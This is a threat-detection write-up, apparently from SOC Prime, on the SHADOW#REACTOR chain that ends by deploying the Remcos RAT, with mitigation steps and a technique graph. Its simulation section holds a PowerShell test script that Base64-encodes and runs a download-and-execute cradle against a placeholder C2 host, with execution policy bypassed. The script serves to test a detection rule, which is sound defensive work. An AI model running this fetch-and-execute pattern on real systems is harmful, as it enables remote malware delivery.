SOC Prime Bias: Medium

15 Jan 2026 18:51
newspaper icon Securonix

SHADOW#REACTOR – TEXT-ONLY STAGING, .NET REACTOR, AND IN-MEMORY REMCOS RAT DEPLOYMENT

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
SHADOW#REACTOR – TEXT-ONLY STAGING, .NET REACTOR, AND IN-MEMORY REMCOS RAT DEPLOYMENT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

SHADOW#REACTOR is a multi-stage Windows malware chain that combines an obfuscated VBS launcher, a PowerShell-based downloader, text-only staging artifacts, a .NET Reactor–protected loader, and MSBuild execution to ultimately deploy the Remcos remote access trojan (RAT).

Investigation

Researchers reconstructed the flow starting with a VBS script retrieved from attacker infrastructure, followed by PowerShell routines that reassemble and decode staged text payloads. The chain proceeds with reflective, in-memory loading of a .NET assembly and a final handoff to MSBuild, which triggers execution of the Remcos RAT. The write-up documents the text-encoded components, decryption logic, and persistence methods used to maintain access.

Mitigation

Increase monitoring coverage for script hosts and interpreters, and prevent VBS/PowerShell execution from user-writable paths where feasible. Add detections for suspicious outbound HTTP traffic to identified infrastructure, MSBuild misuse, and reflective .NET assembly loading. Monitor for common persistence patterns, including Run-key modifications and shortcut-based startup entries.

Response

If SHADOW#REACTOR activity is confirmed, isolate the endpoint and kill the full process chain (wscript.exe → powershell.exe → msbuild.exe). Remove any staged text files and related registry artifacts, and remediate by deleting Remcos binaries and associated configuration blobs. Follow with a thorough forensic review to scope additional compromise and ensure complete eradication.

"graph TB %% Class Definitions Section classDef technique fill:#ffe699 classDef builtin fill:#cccccc classDef malware fill:#ff9999 %% Node definitions tech_user_execution["<b>Technique</b> – <b>T1204.002 User Execution: Malicious File</b><br/><b>Description</b>: Victim runs a malicious file that launches code."] class tech_user_execution technique tool_wscript["<b>Tool</b> – <b>Name</b>: wscript.exe<br/><b>Description</b>: Windows Script Host used to execute VBScript files."] class tool_wscript builtin tech_vbscript_interp["<b>Technique</b> – <b>T1059.005 Command and Scripting Interpreter: Visual Basic</b><br/><b>Description</b>: Executes Visual Basic scripts on the host system."] class tech_vbscript_interp technique tech_powershell_interp["<b>Technique</b> – <b>T1059.001 Command and Scripting Interpreter: PowerShell</b><br/><b>Description</b>: Runs PowerShell commands and scripts."] class tech_powershell_interp technique tech_http_comm["<b>Technique</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/><b>Description</b>: Uses HTTP/HTTPS to download payload fragments from remote servers."] class tech_http_comm technique tech_obfuscation["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Payload is encoded with Base64, XOR and protected by .NET Reactor."] class tech_obfuscation technique tech_reflective_loading["<b>Technique</b> – <b>T1620 Reflective Code Loading</b> / <b>T1574.014 Hijack Execution Flow: AppDomainManager</b><br/><b>Description</b>: Loads a .NET assembly in memory via AppDomainManager hijacking."] class tech_reflective_loading technique tool_msbuild["<b>Tool</b> – <b>Name</b>: MSBuild.exe<br/><b>Description</b>: Trusted developer utility abused as a LOLBin to launch the final stage."] class tool_msbuild builtin malware_remcos["<b>Malware</b> – <b>Name</b>: Remcos RAT<br/><b>Description</b>: Remote access trojan used for command and control."] class malware_remcos malware tech_shortcut_mod["<b>Technique</b> – <b>T1547.009 Shortcut Modification</b><br/><b>Description</b>: Creates a LNK shortcut in the Startup folder to achieve persistence."] class tech_shortcut_mod technique %% Connections showing attack flow tech_user_execution –>|executes via| tool_wscript tool_wscript –>|runs| tech_vbscript_interp tech_vbscript_interp –>|invokes| tech_powershell_interp tech_powershell_interp –>|downloads fragments via| tech_http_comm tech_http_comm –>|reconstructs payload| tech_obfuscation tech_obfuscation –>|loads in memory via| tech_reflective_loading tech_reflective_loading –>|uses| tool_msbuild tool_msbuild –>|launches| malware_remcos malware_remcos –>|may create| tech_shortcut_mod "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An attacker with limited lateral movement rights wishes to execute a remote payload on a compromised Windows host while evading typical script‑blocking defenses. They use PowerShell with -ExecutionPolicy Bypass to ignore execution policy restrictions. The malicious payload is obfuscated as a Base64‑encoded string that, when decoded, creates a System.Net.WebClient object to download a PowerShell script from a C2 server and invoke it. This combination satisfies all three detection criteria (ExecutionPolicy Bypass, FromBase64String, System.Net.WebClient).

  • Regression Test Script:

    #--------------------------------------------
# Simulated malicious PowerShell execution
#--------------------------------------------
# 1. Craft a simple remote script (for demo only)
$remoteScript = 'Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://{C2_HOST}/payload.ps1")'
# 2. Encode the script in Base64
$bytes = [System.Text.Encoding]::Unicode.GetBytes($remoteScript)
$b64   = [Convert]::ToBase64String($bytes)
# 3. Execute with ExecutionPolicy Bypass and FromBase64String
PowerShell -ExecutionPolicy Bypass -Command "
    $decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('$b64'));
    Invoke-Expression $decoded
"

  • Cleanup Commands:

    # Remove any downloaded payloads and stop lingering PowerShell processes
Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'ExecutionPolicy Bypass'} | Stop-Process -Force
Remove-Item -Path "C:Temppayload.ps1" -ErrorAction SilentlyContinue

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free